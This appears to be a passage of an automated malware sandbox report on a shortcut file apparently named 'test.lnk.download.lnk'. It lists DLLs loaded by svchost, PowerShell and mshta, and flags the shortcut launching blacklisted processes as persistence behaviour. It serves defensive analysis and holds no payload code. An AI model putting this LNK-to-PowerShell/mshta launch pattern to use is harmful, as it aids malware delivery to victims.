Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: test.lnk.download.lnkLNK file: ..\..\..\Windows\System32\OpenSSH\ssh.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFC3DE72310 push eax; iretd 4_2_00007FFC3DE7233D

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
